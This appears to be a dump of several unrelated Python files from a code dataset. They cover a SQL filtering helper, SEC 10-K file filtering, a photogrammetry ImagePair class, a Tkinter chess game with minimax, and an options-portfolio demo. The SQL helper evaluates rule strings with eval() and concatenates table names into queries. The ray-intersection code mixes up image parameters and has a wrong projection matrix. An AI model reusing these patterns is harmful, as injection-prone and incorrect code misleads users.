\n        columns called \"num1\" and \"num2\" from some table. That have value 1 or 2 in the ramainder_div_3 column. Column\n        named \"sum\" of which would be less than 200. All columns are combined with an \"AND\" statement.\n        
\n \n :param table: string (name of the table to retrieve from)\n :param columns: list of strings (names of the columns to retrieve)\n :param column_rules: dictionary of rules that will be evaluated\n :return: \n Nested list in which is entry in a list a a column with filtered requested values\n \"\"\"\n # todo: add string comp support\n cursor = self.conn.cursor()\n\n # from the table get all the columns to retrieve\n sql_cmd = \"select \" + \" ,\".join(cols) + \" from \\\"\" + table + \"\\\"\"\n cursor.execute(sql_cmd)\n sel_sets = cursor.fetchall()\n\n if len(col_rules)==0:\n sel_vals = sel_sets\n else:\n # from the table select all the columns to filter for\n sql_cmd = \"select \" + \", \".join([key for key in col_rules]) + \" from \\\"\" + table + \"\\\"\"\n cursor.execute(sql_cmd)\n filter_sets = cursor.fetchall()\n\n # repeat every argument number of times it appears in the selection\n mult = [len(re.findall(\"{}\", col_rules[key])) for key in col_rules]\n\n def _repeat_vals(vals, repeats):\n rep_vals = []\n [[rep_vals.append(vals[i]) for _ in range(repeats[i])] for i in range(len(col_rules))]\n return rep_vals\n filter_sets = [_repeat_vals(set, mult) for set in filter_sets]\n\n # evaluate every row to get a boolean mask of examples\n rule_tmp = \"(\" + \") and (\".join([col_rules[key] for key in col_rules]) + \")\"\n sel_mask = [eval(rule_tmp.format(*val_set)) for val_set in filter_sets]\n\n # apply a boolean mask to take only entries that fit the selection rule\n sel_sets = list(compress(sel_sets, sel_mask))\n sel_vals = [list(x) for x in zip(*sel_sets)]\n return sel_vals\n","sub_path":"affinityDB/database/master_ops.py","file_name":"master_ops.py","file_ext":"py","file_size_in_byte":7431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342568","text":"import os\nimport json\nimport glob\nfrom decouple import config\nfrom datetime import datetime\n\ndef all_data():\n data_dir_location = config('DATA_DIR')\n filenames = list(glob.iglob(os.path.join(\n data_dir_location,\n '0*',\n '10-k',\n '*')))\n\n fns = dict()\n prefix_len = len(data_dir_location) + 1 # +1 removes '/' after prefix\n for fn in filenames:\n dir_name = '/'.join(fn.split('/')[:-2])\n key, value = (fn[prefix_len:].split('/')[0],\n (dir_name,\n int(fn[prefix_len:].split('/')[-1][:4])))\n if key in fns:\n fns[key][1].append(value[1])\n else:\n fns[key] = (dir_name, [value[1]])\n return fns\n\n\ndef split_company_dataset(fns):\n current_year = datetime.now().year\n num_incomplete = 0; incomplete_data = []\n num_young = 0; young_companies = []\n num_out_of_business = 0; out_of_business_companies = []\n num_useable = 0; useable_data = []\n\n for key, v in fns.items():\n if v[1] is None:\n continue\n value = v[1]\n min_year, max_year = min(value), max(value)\n expected_years = range(min_year, max_year)\n all_years_present = all([year in value\n for year in expected_years])\n\n if all_years_present == False:\n incomplete_data.append(v[0])\n num_incomplete += 1\n fns[key] = (v[0], None)\n elif max_year - min_year < 10:\n if (current_year - max_year) < 2: # Since all companies must file 10-k,\n # any who have not are out of business.\n young_companies.append(v[0])\n num_young += 1\n fns[key] = (v[0], None)\n else:\n out_of_business_companies.append(v[0])\n num_out_of_business += 1\n fns[key] = (v[0], None)\n else:\n useable_data.append(v[0])\n num_useable += 1\n\n result = {'num_incomplete': num_incomplete,\n 'incomplete_data': incomplete_data,\n 'num_young': num_young,\n 'young_companies': young_companies,\n 'num_out_of_business': num_out_of_business,\n 'out_of_business_companies': out_of_business_companies,\n 'num_useable': num_useable,\n 'useable_data': useable_data,\n 'all_data': fns}\n return result\n\ndef remove_marked_companies(fns):\n useable_data = []\n for key, v in fns.items():\n if v[1] is None:\n continue\n useable_data.append(v[0])\n return useable_data\n\n\ndef save_output(fns, data_split):\n filename = os.path.join(config('DATA_DIR'), 'filtered_filenames')\n with open(filename, 'w') as f:\n f.write('\\n'.join(fns))\n\n filename = os.path.join(config('DATA_DIR'), 'all_data')\n with open(filename, 'w') as f:\n json.dump(data_split, f, indent=4)\n\n\ndef filter_data():\n filenames = all_data()\n data_split = split_company_dataset(filenames)\n filenames = remove_marked_companies(data_split['all_data'])\n save_output(filenames, data_split)\n\n\nif __name__ == '__main__':\n filter_data()\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301537217","text":"from Camera import Camera\nfrom SingleImage import SingleImage\nfrom MatrixMethods import Compute3DRotationMatrix, Compute3DRotationDerivativeMatrix, ComputeSkewMatrixFromVector\nimport numpy as np\nimport numpy.linalg as la\n\n\nclass ImagePair(object):\n\n def __init__(self, image1, image2):\n \"\"\"\n Initialize the ImagePair class\n :param image1: First image\n :param image2: Second image\n \"\"\"\n self.__image1 = image1\n self.__image2 = image2\n self.__relativeOrientationImage1 = np.array([0, 0, 0, 0, 0, 0]) # The relative orientation of the first image\n self.__relativeOrientationImage2 = None # The relative orientation of the second image\n self.__absoluteOrientation = None\n self.__isSolved = False # Flag for the relative orientation\n\n @property\n def isSolved(self):\n \"\"\"\n Flag for the relative orientation\n returns True if the relative orientation is solved, otherwise it returns False\n\n :return: boolean, True or False values\n \"\"\"\n return self.__isSolved\n\n @property\n def RotationMatrix_Image1(self):\n \"\"\"\n return the rotation matrix of the first image\n\n :return: rotation matrix\n\n :rtype: np.array 3x3\n \"\"\"\n return Compute3DRotationMatrix(self.__relativeOrientationImage1[0], self.__relativeOrientationImage1[1],\n self.__relativeOrientationImage1[2])\n\n @property\n def RotationMatrix_Image2(self):\n \"\"\"\n return the rotation matrix of the second image\n\n :return: rotation matrix\n\n :rtype: np.array 3x3\n \"\"\"\n return Compute3DRotationMatrix(self.__relativeOrientationImage2[0], self.__relativeOrientationImage2[1],\n self.__relativeOrientationImage2[2])\n\n @property\n def PerspectiveCenter_Image1(self):\n \"\"\"\n return the perspective center of the first image\n\n :return: perspective center\n\n :rtype: np.array (3, )\n \"\"\"\n return self.__relativeOrientationImage1[0:3]\n\n @property\n def PerspectiveCenter_Image2(self):\n \"\"\"\n return the perspective center of the second image\n\n :return: perspective center\n\n :rtype: np.array (3, )\n \"\"\"\n return self.__relativeOrientationImage2[0:3]\n\n def ImagesToGround(self, imagePoints1, imagePoints2, Method=None):\n \"\"\"\n Computes ground coordinates of homological points\n\n :param imagePoints1: points in image 1\n :param imagePoints2: corresponding points in image 2\n :param Method: method to use for the ray intersection, three options exist: geometric, vector, Collinearity\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type Method: string\n\n :return: ground points, their accuracies.\n\n :rtype: dict\n\n .. warning::\n\n This function is empty, need implementation\n\n\n **Usage example**\n\n .. code-block:: py\n\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n\n imagePoints1 = np.array([[-4.83,7.80],\n [-4.64, 134.86],\n [5.39,-100.80],\n [4.58,55.13],\n [98.73,9.59],\n [62.39,128.00],\n [67.90,143.92],\n [56.54,-85.76]])\n imagePoints2 = np.array([[-83.17,6.53],\n [-102.32,146.36],\n [-62.84,-102.87],\n [-97.33,56.40],\n [-3.51,14.86],\n [-27.44,136.08],\n [-23.70,152.90],\n [-8.08,-78.07]])\n\n new = ImagePair(image1, image2)\n\n new.ImagesToGround(imagePoints1, imagePoints2, 'geometric'))\n\n \"\"\"\n picpoints_3574_mm = self.__image1.ImageToCamera(imagePoints1)\n picpoints_3575_mm = self.__image1.ImageToCamera(imagePoints2)\n exori_XYZ_1 = self.__image1.exteriorOrientationParameters[0:3]\n exori_XYZ_2 = self.__image2.exteriorOrientationParameters[0:3]\n\n result_Gpoints = []\n dist_e = []\n\n for i in range(picpoints_3574_mm.shape[0]): #calculating per point set\n # following the geometric method for forward intersection:\n x_img1 = np.hstack((picpoints_3574_mm[i, :], -self.__image1.camera.focalLength)) / 1000 # to meter\n x_img2 = np.hstack((picpoints_3575_mm[i, :], -self.__image2.camera.focalLength)) / 1000\n v_img1 = (np.dot(Compute3DRotationMatrix(self.__image1.exteriorOrientationParameters[3],\\\n self.__image1.exteriorOrientationParameters[4],\\\n self.__image1.exteriorOrientationParameters[5]), x_img1)).reshape(3, 1) # Rotating vector +T\n v_img2 = (np.dot(Compute3DRotationMatrix(self.__image1.exteriorOrientationParameters[3],\\\n self.__image1.exteriorOrientationParameters[4],\\\n self.__image1.exteriorOrientationParameters[5]), x_img2)).reshape(3, 1) # Rotating vector +T\n v_img1 /= la.norm(v_img1) # normalization\n v_img2 /= la.norm(v_img2)\n\n # Creating proper vectors\n vvt_img1 = np.dot(v_img1, v_img1.T)\n vvt_img2 = np.dot(v_img2, v_img2.T)\n I = np.eye(v_img1.shape[0])\n\n # Partial derivatives\n A_img1 = I - v_img1\n A_img2 = I - v_img2\n\n # L vector\n l1 = np.dot(A_img1, exori_XYZ_1)\n l2 = np.dot(A_img2, exori_XYZ_2)\n\n # Stack\n A = np.vstack((A_img1, A_img2))\n l = np.hstack((l1, l2))\n\n # Direct solution (no iterations needed)\n X = np.dot(la.inv(np.dot(A.T, A)), np.dot(A.T, l))\n # dist_e1 = np.dot((I - vvt_img1), X - exori_XYZ_1)\n dist_e1 = np.dot(A_img1, X)- l1\n # dist_e2 = np.dot((I - vvt_img2), X - exori_XYZ_2)\n dist_e2 = np.dot(A_img2, X)- l2\n\n dist_e.append((np.abs(dist_e1) + np.abs(dist_e2)) / 2) #Average\n result_Gpoints.append(X)\n\n return np.array(result_Gpoints), np.array(dist_e)\n\n def ComputeDependentRelativeOrientation(self, imagePoints1, imagePoints2, initialValues):\n \"\"\"\n Compute relative orientation parameters\n\n :param imagePoints1: points in the first image [m\"m]\n :param imagePoints2: corresponding points in image 2(homology points) nx2 [m\"m]\n :param initialValues: approximate values of relative orientation parameters\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type initialValues: np.array (6L,)\n\n :return: relative orientation parameters.\n\n :rtype: np.array 5x1 / ADD\n\n .. warning::\n\n Can be held either as dictionary or array. For your implementation and decision.\n\n .. note::\n\n Do not forget to decide how it is held and document your decision\n\n\n **Usage example**\n\n .. code-block:: py\n\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n\n imagePoints1 = np.array([[-4.83,7.80],\n [-4.64, 134.86],\n [5.39,-100.80],\n [4.58,55.13],\n [98.73,9.59],\n [62.39,128.00],\n [67.90,143.92],\n [56.54,-85.76]])\n imagePoints2 = np.array([[-83.17,6.53],\n [-102.32,146.36],\n [-62.84,-102.87],\n [-97.33,56.40],\n [-3.51,14.86],\n [-27.44,136.08],\n [-23.70,152.90],\n [-8.08,-78.07]])\n new = ImagePair(image1, image2)\n\n new.ComputeDependentRelativeOrientation(imagePoints1, imagePoints2, np.array([1, 0, 0, 0, 0, 0])))\n\n \"\"\"\n pass # delete after implementation\n\n def Build_A_B_W(self, cameraPoints1, cameraPoints2, x):\n \"\"\"\n Function for computing the A and B matrices and vector w.\n :param cameraPoints1: points in the first camera system\n :param ImagePoints2: corresponding homology points in the second camera system\n :param x: initialValues vector by, bz, omega, phi, kappa ( bx=1)\n\n :type cameraPoints1: np.array nx3\n :type cameraPoints2: np.array nx3\n :type x: np.array (5,1)\n\n :return: A ,B matrices, w vector\n\n :rtype: tuple\n \"\"\"\n numPnts = cameraPoints1.shape[0] # Number of points\n\n dbdy = np.array([[0, 0, 1], [0, 0, 0], [-1, 0, 0]])\n dbdz = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 0]])\n\n dXdx = np.array([1, 0, 0])\n dXdy = np.array([0, 1, 0])\n\n # Compute rotation matrix and it's derivatives\n rotationMatrix2 = Compute3DRotationMatrix(x[2, 0], x[3, 0], x[4, 0])\n dRdOmega = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'omega')\n dRdPhi = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'phi')\n dRdKappa = Compute3DRotationDerivativeMatrix(x[2, 0], x[3, 0], x[4, 0], 'kappa')\n\n # Create the skew matrix from the vector [bx, by, bz]\n bMatrix = ComputeSkewMatrixFromVector(np.array([1, x[0, 0], x[1, 0]]))\n\n # Compute A matrix; the coplanar derivatives with respect to the unknowns by, bz, omega, phi, kappa\n A = np.zeros((numPnts, 5))\n A[:, 0] = np.diag(\n np.dot(cameraPoints1,\n np.dot(dbdy, np.dot(rotationMatrix2, cameraPoints2.T)))) # derivative in respect to by\n A[:, 1] = np.diag(\n np.dot(cameraPoints1,\n np.dot(dbdz, np.dot(rotationMatrix2, cameraPoints2.T)))) # derivative in respect to bz\n A[:, 2] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdOmega, cameraPoints2.T)))) # derivative in respect to omega\n A[:, 3] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdPhi, cameraPoints2.T)))) # derivative in respect to phi\n A[:, 4] = np.diag(\n np.dot(cameraPoints1, np.dot(bMatrix, np.dot(dRdKappa, cameraPoints2.T)))) # derivative in respect to kappa\n\n # Compute B matrix; the coplanar derivatives in respect to the observations, x', y', x'', y''.\n B = np.zeros((numPnts, 4 * numPnts))\n k = 0\n for i in range(numPnts):\n p1vec = cameraPoints1[i, :]\n p2vec = cameraPoints2[i, :]\n B[i, k] = np.dot(dXdx, np.dot(bMatrix, np.dot(rotationMatrix2, p2vec)))\n B[i, k + 1] = np.dot(dXdy, np.dot(bMatrix, np.dot(rotationMatrix2, p2vec)))\n B[i, k + 2] = np.dot(np.dot(p1vec, np.dot(bMatrix, rotationMatrix2)), dXdx)\n B[i, k + 3] = np.dot(np.dot(p1vec, np.dot(bMatrix, rotationMatrix2)), dXdy)\n k += 4\n\n # w vector\n w = np.diag(np.dot(cameraPoints1, np.dot(bMatrix, np.dot(rotationMatrix2, cameraPoints2.T))))\n\n return A, B, w\n\n def ImagesToModel(self, imagePoints1, imagePoints2, Method):\n \"\"\"\n Mapping points from image space to model space\n\n :param imagePoints1: points from the first image\n :param imagePoints2: points from the second image\n :param Method: method for intersection\n\n :type imagePoints1: np.array nx2\n :type imagePoints2: np.array nx2\n :type Method: string\n\n :return: corresponding model points\n :rtype: np.array nx3\n\n\n .. warning::\n\n This function is empty, need implementation\n\n .. note::\n\n One of the images is a reference, orientation of this image must be set.\n\n \"\"\"\n\n def GroundToImage(self, groundPoints):\n \"\"\"\n Transforming ground points to image points\n\n :param groundPoints: ground points [m]\n\n :type groundPoints: np.array nx3\n\n :return: corresponding Image points\n\n :rtype: np.array nx2\n\n \"\"\"\n pass\n\n # 1. calculating pic plane\n # 2. calculating intersection of vector from perspective center to ground poind\n\n\n def geometricIntersection(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray Intersection based on geometric calculations.\n\n :param cameraPoints1: points in the first image\n :param cameraPoints2: corresponding points in the second image\n\n :type cameraPoints1: np.array nx3\n :type cameraPoints2: np.array nx3\n\n :return: lambda1, lambda2 scalars\n\n :rtype: np.array nx2\n\n .. warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n def vectorIntersction(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray Intersection based on vector calculations.\n\n :param cameraPoints1: points in image space\n :param cameraPoints2: corresponding image points\n\n :type cameraPoints1: np.array nx\n :type cameraPoints2: np.array nx\n\n\n :return: lambda1, lambda2 scalars\n\n :rtype: np.array nx2\n\n .. warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n def CollinearityIntersection(self, cameraPoints1, cameraPoints2):\n \"\"\"\n Ray intersection based on the collinearity principle\n\n :param cameraPoints1: points in image space\n :param cameraPoints2: corresponding image points\n\n :type cameraPoints1: np.array nx2\n :type cameraPoints2: np.array nx2\n\n :return: corresponding ground points\n\n :rtype: np.array nx3\n\n .. warning::\n\n This function is empty, need implementation\n\n \"\"\"\n\n\nif __name__ == '__main__':\n camera = Camera(152, None, None, None, None)\n image1 = SingleImage(camera)\n image2 = SingleImage(camera)\n leftCamPnts = np.array([[-4.83, 7.80],\n [-4.64, 134.86],\n [5.39, -100.80],\n [4.58, 55.13],\n [98.73, 9.59],\n [62.39, 128.00],\n [67.90, 143.92],\n [56.54, -85.76]])\n rightCamPnts = np.array([[-83.17, 6.53],\n [-102.32, 146.36],\n [-62.84, -102.87],\n [-97.33, 56.40],\n [-3.51, 14.86],\n [-27.44, 136.08],\n [-23.70, 152.90],\n [-8.08, -78.07]])\n new = ImagePair(image1, image2)\n\n print(new.ComputeDependentRelativeOrientation(leftCamPnts, rightCamPnts, np.array([1, 0, 0, 0, 0, 0])))\n","sub_path":"ImagePair.py","file_name":"ImagePair.py","file_ext":"py","file_size_in_byte":15304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"614987561","text":"#-*- coding : utf-8 -*-\nimport echecsGUI\nimport echecs\nimport tkinter as tk\nimport minimax\n\n\n\ntypeJeu = \"\" #type de jeu, Humain-Humain, Humain-IA ou IA-IA\nlistEchiquier = [] #liste de tous les Echiquier joué\n\ndef askPromotion(echiq,fenetre):\n \"\"\"demande quel promotion le joueur veut pour son pion\"\"\"\n signal = [False] #la valeur changera à True lorsque le joueur aura fait son choix\n fenetre.unbind(\"\") #empeche de jouer\n popUp = tk.Toplevel(fenetre,width = 200,height = 200) #cree une petite fenetre\n popUp.title(\"Promotion\")\n popUp.resizable(False,False)\n popUp.protocol('WM_DELETE_WINDOW', lambda : clickOk(fenetre,popUp,signal)) #lorsque l'on ferme la fenetre de promotion appele clickOk\n lab = tk.Label(popUp,text = \"Quel promotion pour le pion ?\") #texte qui s'affiche dans la fenetre\n lab.pack()\n listProm = [\"Reine\",\"Tour\",\"Fou\",\"Cavalier\"]\n varProm = tk.IntVar()\n varProm.set(0)\n for i in range(4): #cree 4 bouton, la valeur du bouton selectionné se trouvera dans varProm\n rad = tk.Radiobutton(popUp,variable = varProm,text = listProm[i],value = i)\n rad.pack()\n \n okBut = tk.Button(popUp,text = \"OK\",command = lambda : clickOk(fenetre,popUp,signal)) #bouton OK, le click appele clickOk\n okBut.pack()\n while(not signal[0]): #bloque tant que le joueur n'a pas fait son choix\n fenetre.update()\n\n popUp.destroy() #detruit la fenetre de promotion\n listProm = [\"Q\",\"T\",\"F\",\"C\"]\n return listProm[varProm.get()] #retourne la lettre correspondant au choix fait\n\ndef clickOk(fenetre,popUp,signal):\n \"\"\"fonction appelé lorsque l'on ferme la fenetre de promotion ou lorsque l'on click sur OK\"\"\"\n fenetre.bind(\"\",click) #autorise les clics\n signal[0] = True #indique que le choix a été fait\n\ndef checkVictoire(echiq,fenetre):\n \"\"\"verifie si quelqu'un à gagné et bloque le jeu si c'est le cas\"\"\"\n vic = echiq.checkVictoire()\n if(vic == \"Echecs et Mat\"):\n if(echiq.joueur):\n camp = \"BLANCS\"\n else:\n camp = \"NOIRS\"\n fenetre.unbind(\"\")\n fenetre.title(\"Echecs et Mat, victoire pour les \"+camp)\n fenetre.bell() #emet un son\n return True\n \n elif(vic == \"Pat\"):\n fenetre.unbind(\"\")\n fenetre.title(\"PAT\")\n fenetre.bell()\n return True\n \n return False\n\ndef joueIA(echiqWid):\n \"\"\"fait joueur l'IA\"\"\"\n echiqWid.fenetre.unbind(\"\")\n interdits = []\n if(typeJeu == \"IA-IA\"):\n for i in range(4,11,2):\n if(len(listEchiquier) >= i): #si le jeu est en IA-IA on empeche de le bloquer sur les 4,6,8,10 meme coups en devalorisant l'echiquier d'il y'a 4,6,8,10 coups\n interdits.append(listEchiquier[len(listEchiquier)-i])\n nouvEchiq,prof = minimax.approfProgressif(echiqWid.echiq,echiqWid.echiq.joueur,5,15,interdits,True) #utilise l'appronfondissement progressif avec 5 secondes\n echiqWid.setEchiq(nouvEchiq) #affiche l'echiquier choisi \n listEchiquier.append(nouvEchiq) \n if((not checkVictoire(nouvEchiq,echiqWid.fenetre)) and typeJeu == \"IA-IA\"): #si personne à gagné et que c'est un jeu IA-IA\n joueIA(echiqWid) #refait jouer l'IA\n elif(typeJeu == \"Humain-IA\"): #si un humain joue, autorise les clics\n echiqWid.fenetre.bind(\"\",click)\n \n\ndef click(event):\n \"\"\"fonction appelé lors d'un clic\"\"\"\n caseWid = event.widget #le widget sur lequel on a clické\n if(not isinstance(caseWid,echecsGUI.CaseWidget)): #si ce widget n'est pas une case, on arrete\n return\n echiqWid = caseWid.echiqWid\n if(caseWid in echiqWid.mark): #si c'est une case avec une marque\n posDepl = caseWid.pos \n nouvEchiq = echiqWid.echiq.deplPiece(echiqWid.select.pos,echiqWid.select.lettre,echiqWid.echiq.joueur,posDepl) #recupere l'echiquier apres le deplacemet\n echiqWid.setEchiq(nouvEchiq) #on l'affiche\n if((nouvEchiq.bitBoards[(\"P\", not nouvEchiq.joueur)] & echecs.bitOn(posDepl)) and (posDepl[0] == 7 or posDepl[0] == 0)): #si une promotion doit avoir lieu\n prom = askPromotion(nouvEchiq,echiqWid.fenetre) #on la demande\n nouvEchiq.promotion(posDepl,not nouvEchiq.joueur,prom) #on fait promotion\n echiqWid.setEchiq(nouvEchiq)\n listEchiquier.append(nouvEchiq) #on met à jour l'echiquier affiché\n if((not checkVictoire(nouvEchiq,echiqWid.fenetre)) and typeJeu == \"Humain-IA\"): #si personne à gagné et que une IA joue, fait jouer l'IA\n joueIA(echiqWid)\n else: #si il n'y avait pas de marque\n caseWid.select() #selectionne la case\n\n\nchoix = \"\"\nprint(\"quel type de jeu ?\")\nwhile(choix != \"1\" and choix != \"2\" and choix != \"3\"):\n print(\"pour Humain-Humain entrez : 1\")\n print(\"Humain-IA : 2\")\n print(\"IA-IA : 3\")\n choix = input(\"\")\n\nif(choix == \"1\"):\n typeJeu = \"Humain-Humain\"\nelif(choix == \"2\"):\n typeJeu = \"Humain-IA\"\nelif(choix == \"3\"):\n typeJeu = \"IA-IA\"\n\n\nfen = tk.Tk() #cree la fenetre\nfen.title(\"Jeu d'échecs\")\nfen.resizable(False,False)\nechiquierWid = echecsGUI.EchiquierWidget(fen,echecs.Echiquier(False)) #cree un EchiquierWidget avec l'echiquier de depart et le joueur blanc qui commence\nechiquierWid.pack() #on affiche l'echiquier\nif(typeJeu == \"IA-IA\"):\n fen.update()\n joueIA(echiquierWid)\nelse:\n fen.bind(\"\",click)\nfen.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120981934","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef index(a_list, i):\n \"\"\"\n Given a list. Returns the item at index i\n Allows dynamin list indexing in templates\n \"\"\"\n try:\n return a_list[int(i)]\n except IndexError:\n return None\n","sub_path":"core/templatetags/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378486726","text":"\"\"\"\n후보키\nhttps://programmers.co.kr/learn/courses/30/lessons/42890\n\"\"\"\nfrom itertools import combinations\nfrom collections import defaultdict\n\n\ndef check(case, data):\n case = list(case)\n data = sum(data.values(), [])\n for i in range(1, len(case) + 1):\n for ccase in combinations(case, i):\n if list(ccase) in data:\n return False\n return True\n\n\ndef solution2(relation):\n data = defaultdict(list)\n r = len(relation)\n c = len(relation[0])\n cols = list(map(list, zip(*relation)))\n arr = [i for i in range(c)]\n\n for i in range(1, c + 1):\n for case in combinations(arr, i):\n if check(case, data):\n temp = list(map(list, zip(*[cols[x] for x in case])))\n temp = [\"_\".join(x) for x in temp]\n if len(set(temp)) == r:\n data[len(case)].append(list(case))\n return sum([len(v) for v in data.values()])\n\n\ndef solution(relation):\n answer_list = list()\n col = len(relation[0])\n row = len(relation)\n\n for i in range(1, 1 << col): # 1 ~ 16 : 전체 경우의 수 -> combination 대신\n for num in answer_list:\n if (num & i) == num: # answer_list에 i(부분 집합)가 존재하는 경우\n break\n else:\n tmp_set = set()\n for j in range(row):\n tmp = ''\n for k in range(col):\n if i & (1 << k): # 원소 포함 여부\n tmp += str(relation[j][k])\n tmp_set.add(tmp)\n\n if len(tmp_set) == row:\n answer_list.append(i)\n\n return len(answer_list)\n\n\nprint(solution([[\"100\", \"ryan\", \"music\", \"2\"], [\"200\", \"apeach\", \"math\", \"2\"], [\"300\", \"tube\", \"computer\", \"3\"],\n [\"400\", \"con\", \"computer\", \"4\"], [\"500\", \"muzi\", \"music\", \"3\"], [\"600\", \"apeach\", \"music\", \"2\"]]))\n","sub_path":"2021/20주차/후보키/하현준.py","file_name":"하현준.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"170523812","text":"import pandas as pd\n\nfrom utils.utils import date_string_to_datetime_obj\nfrom market.market import MarketEnvironment\nfrom options.options import PlainVanillaOption\nfrom portfolio.portfolio import Portfolio\n\ndef main():\n\n #\n # portfolio instantiation example\n #\n \n # if np_output is True, the output will be np.ndarray, otherwise pd.DataFrame \n np_output = False # True\n \n # default market environment\n market_env = MarketEnvironment(t=\"01-06-2020\")\n print(market_env)\n\n # underlying values to test\n S_vector = [60, 90, 120]\n print(\"S_vector: {}\\n\".format(S_vector))\n \n # options maturities\n T_call = \"31-12-2020\"\n T_put = \"30-06-2021\"\n \n # options strikes\n K_put = 80\n K_call = 110\n \n # portfolio options positions\n call_pos = 2\n put_pos = -5\n\n #\n # Step 0: empty portfolio initialized\n #\n \n ptf = Portfolio()\n print(ptf)\n \n #\n # Step 1: adding 2 long plain-vanilla call contracts\n #\n \n # plain-vanilla call option\n call = PlainVanillaOption(market_env, K=K_call, T=T_call)\n print(call)\n \n # adding contract to portfolio \n ptf.add_instrument(call, call_pos)\n print(ptf)\n\n # a date-range of 5 valuation dates between t and the nearest maturity\n t_range = pd.date_range(start=ptf.get_t(), \n end=min(T_call, T_put, key=date_string_to_datetime_obj), \n periods=5)\n print(\"t ([t...T] pd.date_range): {}\\n\".format(t_range))\n \n # portfolio value\n print(\"\\nPortfolio Value:\\n\", ptf.price(S=S_vector, t=t_range, np_output=np_output))\n\n # verification with benchmark value\n bechmark_value = call_pos * call.price(S=S_vector, t=t_range, np_output=np_output)\n print(\"\\nbenchmark value:\\n\", bechmark_value) \n\n # portfolio P&L\n print(\"\\nPortfolio P&L:\\n\", ptf.PnL(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark P&L\n benchmark_pnl = call_pos * call.PnL(S=S_vector, t=t_range, np_output=np_output) \n print(\"\\nbenchmark P&L:\\n\", benchmark_pnl)\n \n #\n # Step 2: adding 5 short plain-vanilla put contracts\n #\n \n # plain-vanilla put option\n put = PlainVanillaOption(market_env, option_type=\"put\", K=K_put, T=T_put)\n print(put)\n \n # adding contract to portfolio \n ptf.add_instrument(put, put_pos)\n print(ptf)\n \n # portfolio value\n print(\"\\nPortfolio Value:\\n\", ptf.price(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark value\n benchmark_value = call_pos * call.price(S=S_vector, t=t_range, np_output=np_output) + \\\n put_pos * put.price(S=S_vector, t=t_range, np_output=np_output)\n print(\"\\nbenchmark value:\\n\", benchmark_value) \n\n # portfolio P&L\n print(\"\\nPortfolio P&L:\\n\", ptf.PnL(S=S_vector, t=t_range, np_output=np_output))\n \n # verification with benchmark P&L\n benchmark_pnl = call_pos * call.PnL(S=S_vector, t=t_range, np_output=np_output) + \\\n put_pos * put.PnL(S=S_vector, t=t_range, np_output=np_output) \n print(\"\\nbenchmark P&L:\\n\", benchmark_pnl)\n \n#----------------------------- usage example ---------------------------------#\nif __name__ == \"__main__\":\n \n main() \n","sub_path":"pyBlackScholesAnalytics/example_portfolio.py","file_name":"example_portfolio.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"602890532","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 15 17:11:01 2022.\n\n@author: fabian\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\ndfs = []\nfor api, path in zip(snakemake.input.keys(), snakemake.input):\n df = pd.read_csv(path, skiprows=1, header=None, sep=\" \")\n\n df.columns = [\"API\", \"Memory\", \"Time\"]\n df.API = api\n df.Time -= df.Time[0]\n dfs.append(df)\n\ndf = pd.concat(dfs, ignore_index=True)\n\nfig, ax = plt.subplots(figsize=(8, 6))\nsns.lineplot(data=df, y=\"Memory\", x=\"Time\", hue=\"API\", style=\"API\", ax=ax)\nax.set_xlabel(\"Time [s]\")\nax.set_ylabel(\"Memory Usage [MB]\")\n# ax.set_xlim()\nfig.tight_layout()\nfig.savefig(snakemake.output[0])\n","sub_path":"benchmark/scripts/leftovers/benchmarks-pypsa-eur/plot-benchmarks.py","file_name":"plot-benchmarks.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"100870006","text":"import tensorflow as tf\nimport numpy as np\n\n\nclass ClearSelector():\n def __init__(self, backbone_path, backbone_x, backbone_y, svm_path, mean, std, preprocess_func):\n self.backbone = tf.keras.models.load_model(backbone_path)\n self.x = backbone_x\n self.y = backbone_y\n\n # might be getting BRG from open cv, so image array may need further processing\n def run_on_img(self, im):\n im = tf.image.resize(im, [self.x, self.y]).numpy()\n im = np.reshape(im, [1, self.x, self.y, 3])\n return self.backbone.predict(tf.image.resize(im, [224, 224]))[0][0]\n\n\nif __name__ == \"__main__\":\n params = {\"backbone_path\": \"\", \"backbone_x\": 224, \"backbone_y\": 224,\n \"svm_path\": 